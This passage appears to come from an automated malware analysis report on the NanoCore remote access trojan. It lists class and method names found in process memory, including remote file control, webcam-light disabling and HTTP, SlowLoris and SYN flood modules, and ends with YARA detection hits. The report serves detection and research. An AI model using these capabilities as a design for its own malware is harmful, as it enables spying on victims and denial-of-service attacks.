ypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: vbc.exe, 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: vbc.exe, 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: vbc.exe, 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: vbc.exe, 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: opjlpsercy.exe, 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: opjlpsercy.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
